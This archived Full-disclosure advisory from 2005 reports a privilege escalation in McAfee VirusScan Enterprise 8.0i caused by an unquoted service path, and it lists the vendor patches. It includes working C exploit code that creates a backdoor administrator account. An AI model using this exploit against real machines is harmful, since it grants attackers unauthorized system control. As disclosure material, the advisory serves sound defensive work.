Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] Privilege escalation in McAfee VirusScan Enterprise 8.

from [Reed Arvin] Network Security [Permanent Link]
Subject: [Full-disclosure] Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
Date: Thu, 22 Dec 2005 10:13:39 -0700 
( Original article: http://reedarvin.thearvins.com/20051222-01.html )

Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA
3.5 (patch 5) (http://www.mcafee.com/)

Details:
By default the naPrdMgr.exe process runs under the context of the Local
System account. Every so often it will run through a process where it does
the following:

- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT

The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file. Because of
a lack of quotes the naPrdMgr.exe process first tries to run C:\Program.exe.
If that is not found it tries to run C:\Program Files\Network.exe. When that
is not found it finally runs the EntVUtil.EXE file that it was originally
intending to run. A malicious user can create an application named
Program.exe and place it on the root of the C:\ and it will be run with
Local System privileges by the naPrdMgr.exe process. Source code for an
example Program.exe is listed below.

Vulnerable Versions:
McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.

Solution one from the vendor:
"This issue is resolved in Patch 12."

Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to resolve
the potential exploit. The new plugin is available as a HotFix from McAfee
Tier III Technical Support."

Exploits:

// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
    CHAR  szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program Pr0gr@m$$
/add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n"
);

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators
Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Full-disclosure] iDefense Security Advisory 12.22.05: Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability, labs-no-reply@idefense.com
Next by Date:  MDKSA-2005:235 - Updated kernel packages fix numerous vulnerabilities, Mandriva Security Team
Previous by Thread:  [Full-disclosure] iDefense Security Advisory 12.22.05: Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability, labs-no-reply@idefense.com
Next by Thread:  Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5), Reed Arvin
Indexes:  [Date] [Thread] [Top] [All Lists]